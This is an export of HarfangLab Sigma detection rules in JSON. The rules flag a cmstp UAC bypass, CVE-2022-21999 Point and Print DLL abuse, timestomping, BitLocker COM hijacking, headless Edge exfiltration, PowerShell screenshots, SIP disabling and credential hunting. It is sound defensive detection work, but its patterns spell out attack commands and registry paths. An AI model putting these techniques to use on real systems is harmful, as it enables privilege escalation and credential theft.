"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c554e3b6-a069-4a89-89ba-f0648c009a3f",
"rule_name": "UAC Bypass Executed via cmstp",
"rule_description": "Detects the execution of the cmstp.exe UAC bypass.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the parent process and user session responsible for UAC bypass to look for malicious content or actions.\n",
"rule_creation_date": "2020-09-25",
"rule_modified_date": "2025-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c55e3b3a-1eb9-4864-9f07-e1ee1185048f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085168Z",
"creation_date": "2026-03-23T11:45:34.085170Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085175Z",
"rule_level": "low",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21999",
"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21999",
"https://research.ifcr.dk/spoolfool-windows-print-spooler-privilege-escalation-cve-2022-22718-bf7752b68d81",
"https://docs.microsoft.com/en-us/windows-hardware/drivers/print/downloading-queue-specific-files"
],
"name": "t1574_spoolsv_new_p2p_registered.yml",
"content": "title: Spoolsv Point and Print DLL Added\nid: c55e3b3a-1eb9-4864-9f07-e1ee1185048f\ndescription: |\n Detects the installation of a new Point and Print DLL.\n Attackers can install a new Point and Print DLL as part of CVE-2022-21999 to gain local code execution in spoolsv.\n It is recommended to analyze the DLL pointed to by the registry value to look for malicious content and to investigate any subsequent suspicious behavior by the Spooler service.\nreferences:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21999\n - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21999\n - https://research.ifcr.dk/spoolfool-windows-print-spooler-privilege-escalation-cve-2022-22718-bf7752b68d81\n - https://docs.microsoft.com/en-us/windows-hardware/drivers/print/downloading-queue-specific-files\ndate: 2022/02/16\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1574\n - attack.s0002\n - cve.2022-21999\n - classification.Windows.Source.Registry\n - classification.Windows.Exploit.CVE-2022-21999\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n Image|endswith: '\\spoolsv.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Print\\Printers\\\\*\\CopyFiles\\Module'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n condition: selection and not 1 of filter_*\nlevel: low\n# level: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c55e3b3a-1eb9-4864-9f07-e1ee1185048f",
"rule_name": "Spoolsv Point and Print DLL Added",
"rule_description": "Detects the installation of a new Point and Print DLL.\nAttackers can install a new Point and Print DLL as part of CVE-2022-21999 to gain local code execution in spoolsv.\nIt is recommended to analyze the DLL pointed to by the registry value to look for malicious content and to investigate any subsequent suspicious behavior by the Spooler service.\n",
"rule_creation_date": "2022-02-16",
"rule_modified_date": "2025-04-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1574"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c566c912-0ee9-4945-a27e-417c0403b2ef",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097639Z",
"creation_date": "2026-03-23T11:45:34.097641Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097645Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md",
"https://attack.mitre.org/techniques/T1070/006/"
],
"name": "t1070_006_touch_timestomp_macos.yml",
"content": "title: File Timestamps Altered via Touch (macOS)\nid: c566c912-0ee9-4945-a27e-417c0403b2ef\ndescription: |\n Detects the usage of the touch command to alter file access and modification times.\n This is used by attackers to mimic the timestamp of other files in the same directory.\n It is recommended to check if the modification is legitimate.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md\n - https://attack.mitre.org/techniques/T1070/006/\ndate: 2022/08/25\nmodified: 2025/07/07\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.006\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image|endswith: '/touch'\n CommandLine|contains:\n - ' -a '\n - ' -ac '\n - ' -ca '\n - ' -t '\n - ' -ct '\n - ' -d '\n - ' -cd '\n - ' --date'\n - ' -r '\n - ' -cr '\n - '--reference'\n\n # change only the access time using STAMP\n - ' -at'\n - ' -act'\n - ' -cat'\n # change only the modification time using STAMP\n - ' -mt'\n - ' -mct'\n - ' -cmt'\n # change access and modification times using STAMP\n - ' -amt'\n - ' -mat'\n - ' -amct'\n - ' -mact'\n - ' -camt'\n - ' -cmat'\n - ' -mcat'\n - ' -acmt'\n\n # change only the access time using STRING\n - ' -ad'\n - ' -acd'\n - ' -cad'\n # change only the modification time using STRING\n - ' -md'\n - ' -mcd'\n - ' -cmd'\n # change access and modification times using STRING\n - ' -amd'\n - ' -mad'\n - ' -amcd'\n - ' -macd'\n - ' -camd'\n - ' -cmad'\n - ' -mcad'\n - ' -acmd'\n\n # change only the acess time using reference file\n - ' -ar'\n - ' -acr'\n - ' -car'\n # change only the modification time using reference file\n - ' -mr'\n - ' -mcr'\n - ' -cmr'\n # change access and modification times using reference file\n - ' -amr'\n - ' -mar'\n - ' -amcr'\n - ' -macr'\n - ' -camr'\n - ' -cmar'\n - ' -mcar'\n - ' -acmr'\n\n # touch -r /tmp/KSInstallAction.aD9q7Aw3bv/m/.patch/application.dirpatch /var/folders/l7/kzb_3gd56bl4lgqkkmzb9wt40000gn/T/keystone_install.4MQDcLZ1/Google Chrome.app\n # touch -r /tmp/KSInstallAction.MXP23s6QRN/m/.patch/framework_108.0.5359.98_108.0.5359.124.dirpatch/Resources/th.lproj /Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/108.0.5359.124/Resources/th.lproj\n exclusion_google_chrome_updater:\n GrandparentCommandLine|startswith: '/bin/bash -p /tmp/KSInstallAction'\n CommandLine|contains|all:\n - 'touch -r /tmp/KSInstallAction'\n - 'Google Chrome.app'\n\n exclusion_google_chrome_universal_update:\n CommandLine:\n - 'touch -r /Volumes/Google Chrome * universal Update/.patch/application.dirpatch*'\n - 'touch -r /Volumes/Google Chrome * universal Update/.patch/framework_*.dirpatch*'\n - 'touch -r /Volumes/Google Chrome Dev * Update/.patch/application.dirpatch*'\n - 'touch -r /Volumes/Google Chrome Dev * Update/.patch/framework_*.dirpatch*'\n\n # /bin/bash /usr/local/f-secure/bin/launchd_wrapper com.f-secure.fsmac.licensetool /usr/local/f-secure/fssp/bin/licensetool --update\n exclusion_fsecure_license_updater:\n ProcessGrandparentImage: '/sbin/launchd'\n ProcessParentCommandLine|contains: '/usr/local/f-secure/bin/launchd_wrapper'\n\n exclusion_fbreactnativespec:\n CurrentDirectory: '/Users/*/node_modules/react-native/*'\n\n exclusion_chrome:\n Ancestors|contains:\n - '|/Library/Application Support/Google/GoogleUpdater/*/GoogleUpdater.app/Contents/MacOS/GoogleUpdater|'\n - '|/Users/*/Library/Application Support/Google/GoogleUpdater/*/GoogleUpdater.app/Contents/MacOS/GoogleUpdater|'\n\n exclusion_vmware:\n CommandLine: 'touch -r /library/application support/vmware/vmware fusion/services/contents/library/vmnet-cli -- /library/preferences/vmware fusion/networking'\n ParentCommandLine: '/bin/bash -p /library/application support/vmware/vmware fusion/services/contents/library/services/services.sh --start'\n GrandparentCommandLine|startswith: '/Library/Application Support/VMware/VMware Fusion/Services/Contents/Library/services/VMware Fusion Services'\n\n exclusion_installer:\n ProcessParentCommandLine|startswith: '/bin/sh /tmp/PKInstallSandbox.??????/'\n\n exclusion_snapgene:\n ProcessParentImage:\n - '/Applications/SnapGene.app/Contents/MacOS/SnapGene'\n - '/Users/*/Applications/SnapGene.app/Contents/MacOS/SnapGene'\n\n exclusion_upnote:\n ProcessGrandparentImage: '/Applications/UpNote.app/Contents/MacOS/UpNote'\n\n exclusion_envman:\n ProcessCommandLine: 'touch -a /Users/*/.config/envman/*'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c566c912-0ee9-4945-a27e-417c0403b2ef",
"rule_name": "File Timestamps Altered via Touch (macOS)",
"rule_description": "Detects the usage of the touch command to alter file access and modification times.\nThis is used by attackers to mimic the timestamp of other files in the same directory.\nIt is recommended to check if the modification is legitimate.\n",
"rule_creation_date": "2022-08-25",
"rule_modified_date": "2025-07-07",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c5c3eec3-cf96-44dc-b46a-b56808eb2ab0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090747Z",
"creation_date": "2026-03-23T11:45:34.090749Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090753Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://ipurple.team/2025/08/04/lateral-movement-bitlocker/",
"https://github.com/rtecCyberSec/BitlockMove",
"https://attack.mitre.org/techniques/T1021/003/"
],
"name": "t1021_003_bitlockmove.yml",
"content": "title: Bitlocker COM Hijacking Lateral Movement\nid: c5c3eec3-cf96-44dc-b46a-b56808eb2ab0\ndescription: |\n Detects COM object hijacking attempts targeting the BaaUpdate.exe process within BitLocker encryption services.\n Attackers can exploit this technique to hijack BitLocker's COM interface through registry manipulation, allowing them to execute malicious code within the trusted context of legitimate BitLocker update processes and achieve lateral movement across domain-joined encrypted systems.\n It is recommended to immediately isolate affected systems, investigate the source of COM hijacking by analyzing registry changes and unauthorized DLL modifications and correlate with authentication logs to identify potential lateral movement paths.\nreferences:\n - https://ipurple.team/2025/08/04/lateral-movement-bitlocker/\n - https://github.com/rtecCyberSec/BitlockMove\n - https://attack.mitre.org/techniques/T1021/003/\ndate: 2025/09/23\nmodified: 2025/09/30\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.003\n - attack.discovery\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKU\\\\*\\CLSID\\{A7A63E5C-3877-4840-8727-C1EA9D7A4D50}\\InProcServer32\\(Default)'\n Details|endswith: '.dll'\n IsPreviousDetailsSet: false\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c5c3eec3-cf96-44dc-b46a-b56808eb2ab0",
"rule_name": "Bitlocker COM Hijacking Lateral Movement",
"rule_description": "Detects COM object hijacking attempts targeting the BaaUpdate.exe process within BitLocker encryption services.\nAttackers can exploit this technique to hijack BitLocker's COM interface through registry manipulation, allowing them to execute malicious code within the trusted context of legitimate BitLocker update processes and achieve lateral movement across domain-joined encrypted systems.\nIt is recommended to immediately isolate affected systems, investigate the source of COM hijacking by analyzing registry changes and unauthorized DLL modifications and correlate with authentication logs to identify potential lateral movement paths.\n",
"rule_creation_date": "2025-09-23",
"rule_modified_date": "2025-09-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.discovery",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.003",
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c5daf312-dbde-4955-91e7-9f1c2f5c1d53",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084069Z",
"creation_date": "2026-03-23T11:45:34.084071Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084076Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://medium.com/@simone.kraus/critical-engergy-infrastructure-facility-in-ukraine-attack-b15638f6a402",
"https://www.zscaler.com/blogs/security-research/steal-it-campaign",
"https://attack.mitre.org/techniques/T1567/",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/techniques/T1102/"
],
"name": "t1567_msedge_headless_mode.yml",
"content": "title: Microsoft Edge Run in Headless Mode\nid: c5daf312-dbde-4955-91e7-9f1c2f5c1d53\ndescription: |\n Detects the execution of Microsoft Edge in headless mode.\n Attackers can use browsers in headless mode to download payloads or to make their exfiltration process more stealthy.\n It is recommended to analyze the parent process for malicious content to determine the legitimacy of this action.\nreferences:\n - https://medium.com/@simone.kraus/critical-engergy-infrastructure-facility-in-ukraine-attack-b15638f6a402\n - https://www.zscaler.com/blogs/security-research/steal-it-campaign\n - https://attack.mitre.org/techniques/T1567/\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1102/\ndate: 2023/09/07\nmodified: 2025/10/28\nauthor: HarfangLab\ntags:\n - attack.exfiltration\n - attack.t1567\n - attack.command_and_control\n - attack.t1105\n - attack.t1102\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n Image|endswith: '\\msedge.exe'\n CommandLine|contains: '--headless'\n\n exclusion_parent_edge:\n ParentImage|endswith: '\\msedge.exe'\n\n exclusion_vscode:\n ParentImage|endswith: '\\Code.exe'\n\n exclusion_avira:\n ParentImage:\n - '?:\\Program Files\\Avira\\Endpoint Protection SDK\\endpointprotection.exe'\n - '?:\\Program Files (x86)\\Avira\\Endpoint Protection SDK\\endpointprotection.exe'\n\n exclusion_unity_pdf:\n ParentImage|endswith: '\\Unity.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Unity Technologies Aps'\n CommandLine|contains: '--print-to-pdf='\n\n exclusion_nodejs:\n ParentImage|endswith: '\\node.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'OpenJS Foundation'\n\n exclusion_microsoftdriver:\n ProcessParentInternalName: 'msedgedriver_exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature:\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n exclusion_notatext:\n ParentImage: '?:\\Program Files (x86)\\NS SOFT\\NotaNext\\NotaNext.exe'\n\n exclusion_r:\n ParentImage:\n - '?:\\Program Files\\R\\R-*\\bin\\x64\\Rterm.exe'\n - '?:\\Program Files\\RStudio\\resources\\app\\bin\\rsession-utf8.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\RStudio\\resources\\app\\bin\\rsession-utf8.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c5daf312-dbde-4955-91e7-9f1c2f5c1d53",
"rule_name": "Microsoft Edge Run in Headless Mode",
"rule_description": "Detects the execution of Microsoft Edge in headless mode.\nAttackers can use browsers in headless mode to download payloads or to make their exfiltration process more stealthy.\nIt is recommended to analyze the parent process for malicious content to determine the legitimacy of this action.\n",
"rule_creation_date": "2023-09-07",
"rule_modified_date": "2025-10-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1102",
"attack.t1105",
"attack.t1567"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c5fe22a8-0044-400d-ab37-d3a48796aa0b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611555Z",
"creation_date": "2026-03-23T11:45:34.611558Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611566Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen",
"https://www.powershellgallery.com/packages/GAT/1.2.0/Content/Functions%5CSave-Screenshot.ps1",
"https://attack.mitre.org/techniques/T1113/"
],
"name": "t1113_possible_screenshot_taken_powershell.yml",
"content": "title: Screen Capture Taken via PowerShell\nid: c5fe22a8-0044-400d-ab37-d3a48796aa0b\ndescription: |\n Detects the usage of PowerShell to take screenshot on a host.\n Attackers may attempt to take screenshots to gather information on a running operation.\n It is recommended to investigate the PowerShell command as well as other malicious commands executed on the host to determine legitimacy.\nreferences:\n - https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen\n - https://www.powershellgallery.com/packages/GAT/1.2.0/Content/Functions%5CSave-Screenshot.ps1\n - https://attack.mitre.org/techniques/T1113/\ndate: 2022/11/17\nmodified: 2025/03/12\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1113\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Collection\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_copy:\n PowershellCommand|contains:\n - '.CopyFromScreen '\n - '.CopyFromScreen('\n\n selection_bitmap:\n PowershellCommand|contains:\n - 'Drawing.Bitmap '\n - 'Drawing.Bitmap('\n\n exclusion_activedirectory:\n ProcessCommandLine|endswith: '\\powershell.exe -noexit -command import-module ActiveDirectory'\n PowershellCommand|contains:\n - 'function Get-ScreenPNG {'\n - 'function Set-ClipboardScreenshot {'\n\n exclusion_agicorp:\n PowershellScriptPath: '?:\\Program Files (x86)\\AgiCorp\\\\*\\Updater.ps1'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\n#level: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c5fe22a8-0044-400d-ab37-d3a48796aa0b",
"rule_name": "Screen Capture Taken via PowerShell",
"rule_description": "Detects the usage of PowerShell to take screenshot on a host.\nAttackers may attempt to take screenshots to gather information on a running operation.\nIt is recommended to investigate the PowerShell command as well as other malicious commands executed on the host to determine legitimacy.\n",
"rule_creation_date": "2022-11-17",
"rule_modified_date": "2025-03-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1113"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c63b800c-c4a0-41fa-aaa0-f278bb36b73d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.616927Z",
"creation_date": "2026-03-23T11:45:34.616930Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.616938Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://book.hacktricks.xyz/v/fr/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_sip_disbaled_via_csrutil.yml",
"content": "title: System Integrity Protection Disabled via csrutil\nid: c63b800c-c4a0-41fa-aaa0-f278bb36b73d\ndescription: |\n Detects the execution of csrutil to disable System Integrity Protection (SIP) on macOS.\n SIP is a security feature of macOS that restricts the root user account and limits the actions that the root user can perform on protected parts of the system.\n Disabling SIP allows an attacker to modify protected parts of the system, such as system binaries, and to install malicious software.\n It is recommended to check csrutil's execution context to look for suspicious processes.\nreferences:\n - https://book.hacktricks.xyz/v/fr/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2024/07/03\nmodified: 2025/01/27\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Csrutil\n - classification.macOS.Behavior.DefenseEvasion\n - classification.macOS.Behavior.ImpairDefenses\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/csrutil'\n CommandLine|contains: ' disable'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c63b800c-c4a0-41fa-aaa0-f278bb36b73d",
"rule_name": "System Integrity Protection Disabled via csrutil",
"rule_description": "Detects the execution of csrutil to disable System Integrity Protection (SIP) on macOS.\nSIP is a security feature of macOS that restricts the root user account and limits the actions that the root user can perform on protected parts of the system.\nDisabling SIP allows an attacker to modify protected parts of the system, such as system binaries, and to install malicious software.\nIt is recommended to check csrutil's execution context to look for suspicious processes.\n",
"rule_creation_date": "2024-07-03",
"rule_modified_date": "2025-01-27",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c69bf5ad-bc75-4b74-a48c-2c8840f0068d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081307Z",
"creation_date": "2026-03-23T11:45:34.081309Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081313Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/windows/credentials-hunting",
"https://intrusionz3r0.gitbook.io/intrusionz3r0/enumeration/139-445-smb-enumeration",
"https://attack.mitre.org/techniques/T1552/001/"
],
"name": "t1552_001_powershell_credential_search.yml",
"content": "title: Unsecured Credentials Enumerated via PowerShell\nid: c69bf5ad-bc75-4b74-a48c-2c8840f0068d\ndescription: |\n Detects PowerShell script blocks that may be used to look for unsecured credentials on disk.\n Attackers may try to enumerate files on disks or shares that contain credentials for further lateral movement.\n It is recommended to investigate activity surrounding this event and to hunt for any authentications to possibly affected accounts after this alert.\nreferences:\n - https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/windows/credentials-hunting\n - https://intrusionz3r0.gitbook.io/intrusionz3r0/enumeration/139-445-smb-enumeration\n - https://attack.mitre.org/techniques/T1552/001/\ndate: 2025/12/31\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.006\n - attack.t1552.001\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_select_string_generic:\n ScriptBlockText|contains: 'Select-String'\n\n selection_select_string_patterns:\n ScriptBlockText|contains:\n - '-Pattern cred'\n - '-Pattern ?cred'\n - '-Pattern pass'\n - '-Pattern ?pass'\n\n selection_direct_select_string_1:\n ScriptBlockText|contains:\n - 'Select-String ?cred?'\n - 'Select-String ?pass?'\n\n selection_tree_1:\n ScriptBlockText|contains|all:\n - 'Get-ChildItem'\n - '-Include \\*cred\\*'\n\n selection_tree_2:\n ScriptBlockText|contains|all:\n - 'Get-ChildItem'\n - '-Include \\*pass\\*'\n\n exclusion_common_words:\n ScriptBlockText|contains:\n - 'Select-String ?PasswordComplexity'\n - 'Select-String -Pattern ?passed'\n - 'Select-String ?passed'\n - \"-Pattern Password is cleared\" # Dell BIOS\n\n exclusion_cyberwatch:\n ProcessAncestors|contains: '\\CyberwatchAgent\\cyberwatch-agent.exe'\n\n exclusion_toast_notification:\n ScriptBlockText|contains: '$Toast = [Windows.UI.Notifications.ToastNotification]::new($SerializedXml)'\n\n exclusion_defender:\n ProcessParentImage: '?:\\Program Files\\Windows Defender Advanced Threat Protection\\SenseIR.exe'\n\n condition: (\n (selection_select_string_generic and selection_select_string_patterns) or\n 1 of selection_direct_select_string_* or\n 1 of selection_tree_*\n ) and not 1 of 